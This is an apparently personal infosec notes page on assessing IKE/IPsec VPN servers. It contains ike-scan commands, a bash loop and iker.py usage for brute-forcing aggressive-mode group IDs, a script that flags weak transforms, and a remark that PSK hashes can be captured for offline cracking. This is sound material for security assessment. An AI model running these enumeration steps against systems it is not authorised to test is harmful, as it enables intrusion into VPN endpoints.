akde/infosec

Information security is ultimately about managing risk


IKE (Internet Key Exchange) negotiates IPsec VPN tunnels and listens on UDP 500 (UDP 4500 when NAT traversal is in use). Test a server with

ike-scan -M $target

Example output:

SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080)

Ending ike-scan 1.9.4: 1 hosts scanned in 0.039 seconds (25.32 hosts/sec).  1 returned handshake; 0 returned notify
  • Auth=PSK means that a pre-shared key is used. This matters in combination with aggressive mode: the authentication hash is sent unencrypted, so it can be captured and cracked offline.
  • "1 returned handshake; 0 returned notify" means the server accepted one of the transforms ike-scan proposed, i.e. it is a live IKE responder. A notify (typically NO-PROPOSAL-CHOSEN) would mean the proposal was rejected. With -M the output normally also lists VID (vendor ID) payloads, which help fingerprint the implementation.

Brute force a group ID. Aggressive mode (-A) is tried once per candidate ID (-n) from a wordlist (the file from Hacktricks, saved here as /tmp/list); a candidate the server answers with a handshake is a valid ID. If every candidate produces a handshake, the server does not reveal valid IDs this way. Use the following bash line:

while read -r id; do ike-scan -M -A -n "$id" "$target" | grep -q "1 returned handshake" && echo "Found ID: $id"; done < /tmp/list

If this doesn't work, use iker.py (/tmp/ip is a file containing the target IP):

python iker.py -i /tmp/ip -o /tmp/iker_output -v
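The whole procedure above, as an added example that is not code from the original page or from ike-scan: it parses ike-scan -M output in the format shown above, flags weak transform attributes in the accepted SA (DES/3DES, MD5/SHA1, DH groups 1/2/5, PSK), and runs the aggressive-mode ID enumeration from a wordlist. The two sample outputs are constructed, not captured from a real host, and the variables IKE_SCAN_CMD, IKE_TARGET and IKE_WORDLIST are names chosen for this script, not ike-scan options.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): parse ike-scan -M output,
# flag weak IKE transforms and enumerate aggressive-mode group IDs.
# Assumes the ike-scan 1.9.x output format shown above.
set -u

# Constructed sample outputs (not captured from a real host): one responder
# that accepted a proposal, one that rejected it with a notify.
SAMPLE_HANDSHAKE='Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.10.116    Main Mode Handshake returned
        HDR=(CKY-R=7d1f0c7c0b4a5e1b)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080)
        VID=4a131c81070358455c5728f20e95452f (RFC 3947 NAT-T)

Ending ike-scan 1.9.4: 1 hosts scanned in 0.039 seconds (25.32 hosts/sec).  1 returned handshake; 0 returned notify'

SAMPLE_NOTIFY='Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.10.116    Notify message 14 (NO-PROPOSAL-CHOSEN)

Ending ike-scan 1.9.4: 1 hosts scanned in 0.030 seconds (33.33 hosts/sec).  0 returned handshake; 1 returned notify'

# Exit 0 when the summary line reports a non-zero handshake count.
ike_handshake_ok() {
    printf '%s\n' "$1" | grep -Eq '[1-9][0-9]* returned handshake'
}

# Print the accepted transform as key=value lines: Enc, Hash, Group, Auth.
ike_sa_fields() {
    printf '%s\n' "$1" | sed -n 's/.*SA=(\(.*\)).*/\1/p' \
        | tr ' ' '\n' | grep -E '^(Enc|Hash|Group|Auth)='
}

# One line per weak or noteworthy attribute of the accepted transform.
ike_flag_weak() {
    ike_sa_fields "$1" | while IFS= read -r kv; do
        case "$kv" in
            Enc=DES|Enc=3DES)   echo "WEAK: ${kv#*=} encryption" ;;
            Hash=MD5|Hash=SHA1) echo "WEAK: ${kv#*=} integrity hash" ;;
            Group=1:*|Group=2:*|Group=5:*)
                                echo "WEAK: DH ${kv#*=} (MODP 1536-bit or smaller)" ;;
            Auth=PSK)           echo "NOTE: PSK auth; with aggressive mode the PSK hash can be captured for offline cracking" ;;
        esac
    done
}

# Aggressive-mode ID enumeration: a candidate ID that yields a handshake is valid.
# IKE_SCAN_CMD (a name chosen here) lets a stand-in scanner replace ike-scan for offline testing.
: "${IKE_SCAN_CMD:=ike-scan}"
ike_enum_ids() {
    local target=$1 wordlist=$2 id out
    while IFS= read -r id; do
        [ -n "$id" ] || continue
        out=$($IKE_SCAN_CMD -M -A -n "$id" "$target" 2>/dev/null)
        if ike_handshake_ok "$out"; then
            echo "Found ID: $id"
        fi
    done < "$wordlist"
}

# Real run: IKE_TARGET=10.10.10.116 IKE_WORDLIST=/tmp/list bash ike_check.sh
if [ -n "${IKE_TARGET:-}" ]; then
    out=$(ike-scan -M "$IKE_TARGET")
    if ike_handshake_ok "$out"; then
        ike_flag_weak "$out"
        [ -n "${IKE_WORDLIST:-}" ] && ike_enum_ids "$IKE_TARGET" "$IKE_WORDLIST"
    else
        echo "No handshake from $IKE_TARGET (try other transforms, or UDP 4500)"
    fi
fi
```

Run against the sample output on this page, ike_flag_weak reports four findings (3DES, SHA1, modp1024 and PSK). The handshake check keys on the summary line rather than on the per-host line, so it works the same for main and aggressive mode output.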


About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
